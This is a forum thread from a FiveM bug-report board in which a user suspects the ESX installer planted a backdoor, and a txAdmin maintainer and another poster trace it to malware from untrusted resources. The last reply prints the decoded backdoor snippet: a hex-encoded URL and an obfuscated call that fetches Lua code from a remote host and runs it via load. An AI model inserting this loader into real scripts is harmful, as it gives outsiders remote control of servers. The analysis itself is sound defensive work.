Backdoor while Installing FX-Server ESX with tx!

FiveM Discussion Bug reports
1

I dont know if it’s supposed to be. If you install the newest fx-server and download esx while installation, it will install a backdoor. All my Script’s are messed up. Every single client script was edited at the same time.
[link to site selling unauthorized and abusive products removed]

Unbenannt - Kopie
Unbenannt - Kopie1115×803 49.8 KB

2

installed again and again and again and finally it came without the backdoor.

1 Like
3

Hello, txAdmin maintainer here.

Thanks for reporting this, I just checked and here are my findings:

  1. After deploying it on my pc, I did not see the backdoor in that file.
  2. The ESX Legacy recipe has not been updated in the last week.
  3. The esx_taxijob was not updated in the last few days.
  4. If you kept installing it “again and again” I don’t see a reason why at any time it would change.

I am somewhat confident you just downloaded some backdoored resource that infected other resources, including esx_taxijob.

1 Like
4

Probably an “anti-cheat”

5

No, they usually add a separate obfuscated file or load it from the anti-cheat resource; they have no need to add code directly to files like this. “Enchanced_Tabs” is part of some known malware (see here).

Generally happens when people download and run resources from untrustworthy (see here) sources (i.e. leaking communities, resellers) - then those people randomly go around blaming legitimate developers for their problems and telling people moronic garbage like
image

Running this function in a Lua compiler

local char = {
    '68', '74', '74', '70', '73', '3a', '2f', '2f', '63', '69', '70', '68', '65', '72',
    '2d', '70', '61', '6e', '65', '6c', '2e', '6d', '65', '2f', '5f', '69', '2f', '69',
    '3f', '74', '6f', '3d', '6c', '36', '54', '72', '32'
}

function str_utf8()
   _empt = ''
   
   for id,it in pairs(char) do
      _empt = _empt..it 
   end
   
   return (_empt:gsub('..', function(cc)
       return string.char(tonumber(cc, 16))
   end))
end

print(str_utf8())

Outputs a link to cipher.

Enchanced_Tabs[10](str_utf8(), function(e, d)
    local s = Enchanced_Tabs[11](Enchanced_Tabs[13](d))
    if (d == nil) then return end
    s()
end)

Enchanced_Tabs[10] is PerformHttpRequest, Enchanced_Tabs[11] is assert, and Enchanced_Tabs[13] is load. Common remote execution garbage will fetch code (as a string) from cipher, compile with load, than execute.

More info at cipher/chapter-1-payload.md at 77a02baa19ccd34d6c3ac90b631415f494642f46 · ericstolly/cipher · GitHub